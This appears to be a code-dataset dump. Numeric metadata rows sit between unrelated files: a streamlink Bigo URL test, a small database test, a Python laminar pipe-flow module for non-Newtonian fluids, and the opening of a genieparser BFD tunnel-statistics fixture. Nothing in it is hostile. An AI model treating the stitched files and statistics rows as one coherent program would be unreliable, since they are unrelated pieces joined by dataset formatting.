| 46.51711 | 298 | 0.688818 | 1,589 | 12,234 | 5.154185 | 0.118943 | 0.101587 | 0.119658 | 0.11746 | 0.822711 | 0.819048 | 0.811722 | 0.811722 | 0.806716 | 0.806716 | 0 | 0.009714 | 0.225846 | 12,234 | 262 | 299 | 46.694656 | 0.855031 | 0.754373 | 0 | 0.7875 | 0 | 0 | 0.036226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0875 | false | 0.0875 | 0 | 0 | 0.0875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
313ec7e8b0a7b59e2fb72a2b08b03c94678b17f5 | 1,645 | py | Python | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | 1 | 2020-06-19T08:34:23.000Z | 2020-06-19T08:34:23.000Z | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | null | null | null | import unittest
from streamlink.plugins.bigo import Bigo
class TestPluginBigo(unittest.TestCase):
def test_can_handle_url(self):
# Correct urls
self.assertTrue(Bigo.can_handle_url("http://bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("https://bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("https://www.bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/fancy1234"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/abc.123"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/000000.00"))
# Old URLs don't work anymore
self.assertFalse(Bigo.can_handle_url("http://live.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("https://live.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("http://www.bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://www.bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://bigoweb.co/show/00000000"))
# Wrong URL structure
self.assertFalse(Bigo.can_handle_url("ftp://www.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("https://www.bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://www.bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://bigo.tv/show/00000000"))
| 53.064516 | 85 | 0.703951 | 231 | 1,645 | 4.844156 | 0.177489 | 0.152815 | 0.203753 | 0.257373 | 0.806971 | 0.80429 | 0.776586 | 0.709562 | 0.709562 | 0.697945 | 0 | 0.094604 | 0.132523 | 1,645 | 30 | 86 | 54.833333 | 0.689559 | 0.036474 | 0 | 0 | 0 | 0 | 0.330803 | 0.016445 | 0 | 0 | 0 | 0 | 0.818182 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
317a17ddef06ca9f8f3906c5462ecdd570cf0c29 | 111 | py | Python | tests/unit/db_test.py | backdfund/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | 18 | 2021-02-17T23:04:03.000Z | 2022-02-02T23:07:32.000Z | tests/unit/db_test.py | Guangye-C/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | null | null | null | tests/unit/db_test.py | Guangye-C/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | 2 | 2021-09-12T03:12:44.000Z | 2022-03-30T09:34:40.000Z | from backd import db
def test_count_events():
assert db.count_events() == len(list(db.iterate_events()))
| 18.5 | 62 | 0.720721 | 17 | 111 | 4.470588 | 0.705882 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 5 | 63 | 22.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
317ab34e058c0ef03181c6729f08636f18434b2e | 14,171 | py | Python | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 2 | 2021-07-15T18:47:35.000Z | 2022-03-16T00:06:38.000Z | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 1 | 2021-08-28T12:38:04.000Z | 2021-08-28T12:38:04.000Z | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 1 | 2021-03-01T14:35:09.000Z | 2021-03-01T14:35:09.000Z | import numpy as np
import scipy.optimize as spo
import scipy.integrate as spi
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from . import viscosity
class laminar:
"""
This class contains a variety of methods for computing quantities of interest for laminar flow in a tube.
The argument viscosity requires a function (or class with method) calc_visc with parameters already set
and the shear rate as it's only argument. Default values are provided. A default visosity function is provided
"""
def __init__(self,name='Default',density=1000.,radius=.01,length=1.,viscosity=viscosity.newtonian(name='default',mu=1.), \
scale=1.e+6,pressure_drop = None, q = None):
self.name=name
self.__density = density
self.__radius=radius
self.__length=length
self._viscosity = viscosity
self.__r = 0.
self.scale=scale
if pressure_drop:
self.pressure_drop = pressure_drop
else:
self.pressure_drop = None
if q:
self.q = q
self.__q = q
else:
self.__q = None
def __str__(self):
return str('Name ='+self.name+'\n'+
'Radius ='+str(self.__radius)+'\n'+
'Length ='+str(self.__length)+'\n'+
'Pressure drop ='+str(self.__pressure_drop)+'\n'+
'Flow rate ='+str(self.__q)+'\n'+
'Shear rate wall = '+str(self._shear_rate_wall()))
def _shear_rate_equation(self,solve_rate,dp):
return solve_rate * self._viscosity.calc_visc(solve_rate) - \
dp/self.__length*self.__r/2.
def shear_rate(self,rad,dp):
"""
This method computes the shear rate at a radial position (rad) that is the only argument.
"""
self.__r = rad
return spo.brentq(lambda x: self._shear_rate_equation(x,dp), 0.,1.e+6)
def vz(self,rad,dp):
"""
This method computes the axial velocity vz at a radial position, rad.
"""
# (-) sign deals with vz<0 whehn pressuredrop>0
#return -spi.quad(self.shear_rate,self.__radius,rad)[0]
return -spi.quad(lambda x: self.shear_rate(x,dp),self.__radius,rad)[0]
def stress_wall(self):
"""
Computes shear stress at wall, radial position radius.
"""
if self.__pressure_drop:
return self.__radius/2.*self.__pressure_drop/self.__length
else:
return None
def _shear_rate_wall(self):
"""
Computes the true wall shear rate, or shear rate at radial position radius.
"""
rad = self.__radius
if self.__pressure_drop:
dp = self.__pressure_drop
return self.shear_rate(rad,dp)
else:
return None
def shear_rate_plot(self):
"""
Creates plot of shear rate versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.shear_rate(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Shear rate')
return [x,y]
def viscosity_wall(self):
"""
Computes viscosity at wall, radial position radius.
"""
return self._viscosity.calc_visc(self._shear_rate_wall())
def re_wall(self):
"""
Computes Reynolds number at the wall.
"""
return self.__density*self.__radius*2.*self.__q/(3.14159*self.__radius**2)/self.viscosity_wall()
def vz_plot(self):
"""
Creates plot of axial velocity versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.vz(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Velocity')
def __q_integrand(self,rad,dp):
return 2.*3.141592653589*rad*self.vz(rad,dp)
def __q_calc(self,dp):
"""
Computes volumetric flow rate for preessure drop argument of dp_want.
The object attribute self.pressure_drop is set to dp_want.
"""
#return spi.quad(self.__q_integrand(),0.,self.__radius)[0]
return spi.quad( lambda x: self.__q_integrand(x,dp),0.,self.__radius)[0]
def __q_eqn(self,dp_v):
return self.__q_calc(dp_v) - self.__q
def __dp_calc(self):
"""
Computes the pressure drop for a volumetric flow rate of q_want.
The computation is iterative due to nature of many viscosity functiions.
The object attribute self.pressure_drop is set to result.
"""
self.__pressure_drop= spo.brentq(self.__q_eqn,self.scale_min,self.scale_max)
return
def q_plot(self,pressure_drop_min,pressure_drop_max):
"""
Creates log-log plot of pressure drop versus flow rate.
A log-spacing of pressure drops between args pressure_drop_min and pressure_drop_max
are created.
"""
x = np.logspace(np.log10(pressure_drop_min),np.log10(pressure_drop_max),51)
y = [self.__q_calc(dp) for dp in x]
plt.loglog(y,x,'-')
plt.xlabel('Flow rate')
plt.ylabel('Pressure drop')
plt.title(self.name)
@property
def pressure_drop(self):
return self.__pressure_drop
@pressure_drop.setter
def pressure_drop(self,pressure_drop):
if pressure_drop:
self.__pressure_drop = pressure_drop
self.__q = self.__q_calc(pressure_drop)
else:
self.__pressure_drop = None
@property
def q(self):
return self.__q
@q.setter
def q(self,q):
if q:
self.__q = q
# Estimate dp_a to set scale to reasonalble value
dp_a = 8.*self._viscosity.calc_visc(4.*self.__q/(3.14158*self.__radius**3))* \
self.__length*self.__q/(3.14159*self.__radius**4)
self.scale_max=2.*dp_a
self.scale_min=dp_a/100.
self.__dp_calc()
else:
self.__q = None
@property
def density(self):
return self.__density
@property
def shear_rate_wall(self):
return self._shear_rate_wall()
@property
def shear_stress_wall(self):
return self.stress_wall()
@property
def radius(self):
return self.__radius
@radius.setter
def radius(self,radius):
self.__radius = radius
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
@property
def length(self):
return self.__length
@length.setter
def length(self,length):
self.__length = length
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
#@property
#def viscosity(self):
# return self._viscosity
#@viscosity.setter
#def viscosity(self,viscosity):
# self._viscosity = viscosity
# if self.pressure_drop:
# self.__q = self.__q_calc(self.pressure_drop)
# else:
# self.__pressure_drop = None
#-------------------------------------------------------------------------------------
# Analytical solution for HB
#-------------------------------------------------------------------------------------
class laminar_HB_analytical:
"""
This class contains analytical solution for pipe flow of Herschel-Bulkley fluids
"""
def __init__(self,name='Default',density=1000.,radius=.01,length=1.,viscosity=viscosity.herschel_bulkley(name='default',tauy=1.,k=1.,n=1.), \
scale=1.e+6,pressure_drop = None, q = None):
self.name=name
self.__density = density
self.__radius=radius
self.__length=length
self._viscosity = viscosity
self.__r = 0.
self.scale=scale
if pressure_drop:
self.pressure_drop = pressure_drop
else:
self.pressure_drop = None
if q:
self.q = q
self.__q = q
else:
self.__q = None
def __str__(self):
return str('Name ='+self.name+'\n'+
'Radius ='+str(self.__radius)+'\n'+
'Length ='+str(self.__length)+'\n'+
'Pressure drop ='+str(self.__pressure_drop)+'\n'+
'Flow rate ='+str(self.__q)+'\n'+
'Shear rate wall = '+str(self._shear_rate_wall()))
def shear_rate(self,rad,dp):
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx # radius of unyielded core
n=self._viscosity.n
k=self._viscosity.k
Vc = (1/(2*k)*dp_dx)**(1/n)*(n/(n+1))*(self.__radius-r_y)**((n+1)/n)
if rad<=r_y:
gammadot=0
else:
gammadot=Vc*(n+1)/n/(self.__radius-r_y)*((rad-r_y)/(self.__radius-r_y))**(1/n)
return gammadot
def vz(self,rad,dp):
"""
This method computes the axial velocity vz at a radial position, rad.
"""
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx
n=self._viscosity.n
k=self._viscosity.k
Vc = (1/(2*k)*dp_dx)**(1/n)*(n/(n+1))*(self.__radius-r_y)**((n+1)/n)
if rad<=r_y:
V=Vc
else:
V=Vc*(1-((rad-r_y)/(self.__radius-r_y))**((n+1)/n))
return V
def stress_wall(self):
"""
Computes shear stress at wall, radial position radius.
"""
if self.__pressure_drop:
return self.__radius/2.*self.__pressure_drop/self.__length
else:
return None
def _shear_rate_wall(self):
"""
Computes the true wall shear rate, or shear rate at radial position radius.
"""
rad = self.__radius
if self.__pressure_drop:
dp = self.__pressure_drop
return self.shear_rate(rad,dp)
else:
return None
def shear_rate_plot(self):
"""
Creates plot of shear rate versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.shear_rate(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Shear rate')
def viscosity_wall(self):
"""
Computes viscosity at wall, radial position radius.
"""
return self._viscosity.calc_visc(self._shear_rate_wall())
def re_wall(self):
"""
Computes Reynolds number at the wall.
"""
return self.__density*self.__radius*2.*self.__q/(3.14159*self.__radius**2)/self.viscosity_wall()
def vz_plot(self):
"""
Creates plot of axial velocity versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.vz(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Velocity')
def __q_calc(self,dp):
R=self.__radius
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx
n=self._viscosity.n
k=self._viscosity.k
return np.pi*n/(3*n+1)*(dp_dx/2/k)**(1/n)*R**(1/n+3)*(1-r_y/R)**((n+1)/n)*(1+2*n/(2*n+1)*r_y/R*(1+n/(n+1)*r_y/R))
def __q_eqn(self,dp_v):
return self.__q_calc(dp_v) - self.__q
def __dp_calc(self):
"""
Computes the pressure drop for a volumetric flow rate of q_want.
The computation is iterative due to nature of many viscosity functiions.
The object attribute self.pressure_drop is set to result.
"""
self.__pressure_drop= spo.brentq(self.__q_eqn,self.scale_min,self.scale_max)
return
def q_plot(self,pressure_drop_min,pressure_drop_max):
"""
Creates log-log plot of pressure drop versus flow rate.
A log-spacing of pressure drops between args pressure_drop_min and pressure_drop_max
are created.
"""
x = np.logspace(np.log10(pressure_drop_min),np.log10(pressure_drop_max),51)
y = [self.__q_calc(dp) for dp in x]
plt.loglog(y,x,'-')
plt.xlabel('Flow rate')
plt.ylabel('Pressure drop')
plt.title(self.name)
@property
def pressure_drop(self):
return self.__pressure_drop
@pressure_drop.setter
def pressure_drop(self,pressure_drop):
if pressure_drop:
self.__pressure_drop = pressure_drop
self.__q = self.__q_calc(pressure_drop)
else:
self.__pressure_drop = None
@property
def q(self):
return self.__q
@q.setter
def q(self,q):
if q:
self.__q = q
# Estimate dp_a to set scale to reasonalble value
dp_a = 8.*self._viscosity.calc_visc(4.*self.__q/(3.14158*self.__radius**3))* \
self.__length*self.__q/(3.14159*self.__radius**4)
self.scale_max=2.*dp_a
self.scale_min=dp_a/100.
self.__dp_calc()
else:
self.__q = None
@property
def density(self):
return self.__density
@property
def shear_rate_wall(self):
return self._shear_rate_wall()
@property
def shear_stress_wall(self):
return self.stress_wall()
@property
def radius(self):
return self.__radius
@radius.setter
def radius(self,radius):
self.__radius = radius
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
@property
def length(self):
return self.__length
@length.setter
def length(self,length):
self.__length = length
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
| 31.702461 | 145 | 0.576388 | 1,860 | 14,171 | 4.089247 | 0.091398 | 0.132527 | 0.100973 | 0.023666 | 0.834999 | 0.824086 | 0.821325 | 0.805943 | 0.805943 | 0.800552 | 0 | 0.016571 | 0.301602 | 14,171 | 446 | 146 | 31.773543 | 0.751945 | 0.20175 | 0 | 0.903448 | 0 | 0 | 0.030032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.17931 | false | 0 | 0.02069 | 0.068966 | 0.348276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31c3276c55e1641917dd81cc8f6a8d531e33ad17 | 27,072 | py | Python | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | expected_output = {
"tunnel": {
"150.0.5.1": {
"remote": {
"150.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299689,
"bfd_echo_rx_pkts": 299687,
"bfd_echo_tx_octets": 30717979,
"bfd_echo_rx_octets": 34913686
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2509,
"bfd_pmtu_rx_pkts": 2509,
"bfd_pmtu_tx_octets": 1823850,
"bfd_pmtu_rx_octets": 1860352
}
}
},
"150.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299682,
"bfd_echo_rx_pkts": 299637,
"bfd_echo_tx_octets": 30717139,
"bfd_echo_rx_octets": 34908134
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294495,
"bfd_echo_rx_pkts": 294454,
"bfd_echo_tx_octets": 30203871,
"bfd_echo_rx_octets": 34285901
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294125,
"bfd_echo_rx_pkts": 293733,
"bfd_echo_tx_octets": 30167101,
"bfd_echo_rx_octets": 34201978
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294305,
"bfd_echo_rx_pkts": 294005,
"bfd_echo_tx_octets": 30184935,
"bfd_echo_rx_octets": 34233960
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.8.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299449,
"bfd_echo_rx_pkts": 299114,
"bfd_echo_tx_octets": 30694415,
"bfd_echo_rx_octets": 34847061
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876636
}
}
},
"150.0.10.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299747,
"bfd_echo_rx_pkts": 299744,
"bfd_echo_tx_octets": 30723735,
"bfd_echo_rx_octets": 34920519
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294181,
"bfd_echo_rx_pkts": 293700,
"bfd_echo_tx_octets": 30172960,
"bfd_echo_rx_octets": 34198326
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876658
}
}
},
"151.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299753,
"bfd_echo_rx_pkts": 299740,
"bfd_echo_tx_octets": 30724497,
"bfd_echo_rx_octets": 34919941
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2509,
"bfd_pmtu_rx_pkts": 2509,
"bfd_pmtu_tx_octets": 1823850,
"bfd_pmtu_rx_octets": 1860301
}
}
},
"151.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299738,
"bfd_echo_rx_pkts": 299732,
"bfd_echo_tx_octets": 30722858,
"bfd_echo_rx_octets": 34919086
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294489,
"bfd_echo_rx_pkts": 294446,
"bfd_echo_tx_octets": 30203228,
"bfd_echo_rx_octets": 34285004
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294158,
"bfd_echo_rx_pkts": 293764,
"bfd_echo_tx_octets": 30170564,
"bfd_echo_rx_octets": 34205516
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294322,
"bfd_echo_rx_pkts": 294012,
"bfd_echo_tx_octets": 30186562,
"bfd_echo_rx_octets": 34234926
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876662
}
}
},
"151.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294102,
"bfd_echo_rx_pkts": 293625,
"bfd_echo_tx_octets": 30164579,
"bfd_echo_rx_octets": 34189858
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
}
}
},
"151.0.5.1": {
"remote": {
"150.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299708,
"bfd_echo_rx_pkts": 299707,
"bfd_echo_tx_octets": 30719580,
"bfd_echo_rx_octets": 34916359
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299703,
"bfd_echo_rx_pkts": 299698,
"bfd_echo_tx_octets": 30719358,
"bfd_echo_rx_octets": 34915034
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294490,
"bfd_echo_rx_pkts": 294438,
"bfd_echo_tx_octets": 30203320,
"bfd_echo_rx_octets": 34284114
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294180,
"bfd_echo_rx_pkts": 293787,
"bfd_echo_tx_octets": 30172840,
"bfd_echo_rx_octets": 34208171
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294312,
"bfd_echo_rx_pkts": 294016,
"bfd_echo_tx_octets": 30185621,
"bfd_echo_rx_octets": 34235259
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.8.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299427,
"bfd_echo_rx_pkts": 299084,
"bfd_echo_tx_octets": 30692146,
"bfd_echo_rx_octets": 34843608
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.10.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299743,
"bfd_echo_rx_pkts": 299742,
"bfd_echo_tx_octets": 30723451,
"bfd_echo_rx_octets": 34920153
},
